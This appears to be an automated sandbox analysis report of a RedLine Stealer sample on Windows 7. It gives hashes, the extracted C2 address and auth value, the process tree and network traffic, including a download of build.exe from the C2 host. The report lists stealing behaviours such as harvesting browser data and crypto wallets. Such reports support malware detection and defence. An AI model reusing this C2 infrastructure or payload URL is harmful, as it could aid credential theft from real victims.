Analysis

  • max time kernel
    50s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/09/2022, 11:32 UTC

General

  • Target

    0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe

  • Size

    361KB

  • MD5

    b6608633aed154db58c9430b6e4d26c5

  • SHA1

    9b9d0d7cb57b48b8e6db6c8fb292e5322f19dec9

  • SHA256

    0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11

  • SHA512

    58408b452f99eb74ab7443e8946e45f6bce62c57cef11de0e2fa9123b17d859dcf5edc8a3637d623e4f54790079cad6bf4baf86e9942649f4dc60e059af4e550

  • SSDEEP

    6144:eEaXBUcN2BRrn1fH0N6GkBut5adsSEK69yDPhSjYlakxjTLVqoARRSTZAPdg+:/aRDNoVJKRtUdsSEK69yDPhSjYlakxjv

Malware Config

Extracted

Family

redline

Botnet

0002

C2

13.72.81.58:13413

Attributes
  • auth_value

    866ce0ed8cfe2be77fb43a4912677698

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
    "C:\Users\Admin\AppData\Local\Temp\0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:752
    • C:\Users\Admin\AppData\Local\Temp\build.exe
      "C:\Users\Admin\AppData\Local\Temp\build.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1944

Network

  • US
    GET
    http://13.72.81.58:7766/build.exe
    0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
    Remote address:
    13.72.81.58:7766
    Request
    GET /build.exe HTTP/1.1
    Host: 13.72.81.58:7766
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sun, 25 Sep 2022 11:32:35 GMT
  • 13.72.81.58:13413
    Process: 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
    Sent: 4.9MB
    Received: 74.8kB
    Packets sent: 3366
    Packets received: 1692
  • 13.72.81.58:7766
    Protocol: http
    URL: http://13.72.81.58:7766/build.exe
    Process: 0bd647c00f31729fba742100e5c344b88f853ed6e96fde093a3102f28cc54d11.exe
    Sent: 6.6kB
    Received: 383.4kB
    Packets sent: 142
    Packets received: 277
    HTTP Request: GET http://13.72.81.58:7766/build.exe
    HTTP Response: 200
  • 13.72.81.58:13413
    Process: build.exe
    Sent: 4.9MB
    Received: 74.5kB
    Packets sent: 3360
    Packets received: 1696

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\build.exe

    Filesize

    362KB

    MD5

    37e39c732e3ec7e26743440e8986e2b0

    SHA1

    9637244713aeb6150e123b7d4472114c8bb0e4fa

    SHA256

    b5be007ac6b33d768841aa988ecb6efec133d1765b74bc9ccb516310b9c9ce7c

    SHA512

    7837285fee875c3572110a3ec3aad336f12f320e4d72607dd7d0f7c2669c0694daee7ecea0d4ffe1e36bca59783f0d0cd929f69d2107f567221e1e74d43f76eb

  • \Users\Admin\AppData\Local\Temp\build.exe

    Filesize

    362KB

    MD5

    37e39c732e3ec7e26743440e8986e2b0

    SHA1

    9637244713aeb6150e123b7d4472114c8bb0e4fa

    SHA256

    b5be007ac6b33d768841aa988ecb6efec133d1765b74bc9ccb516310b9c9ce7c

    SHA512

    7837285fee875c3572110a3ec3aad336f12f320e4d72607dd7d0f7c2669c0694daee7ecea0d4ffe1e36bca59783f0d0cd929f69d2107f567221e1e74d43f76eb

  • memory/752-54-0x0000000000800000-0x0000000000860000-memory.dmp

    Filesize

    384KB

  • memory/752-55-0x00000000003B0000-0x00000000003B6000-memory.dmp

    Filesize

    24KB

  • memory/752-56-0x0000000075841000-0x0000000075843000-memory.dmp

    Filesize

    8KB

  • memory/1944-61-0x0000000000CB0000-0x0000000000D10000-memory.dmp

    Filesize

    384KB
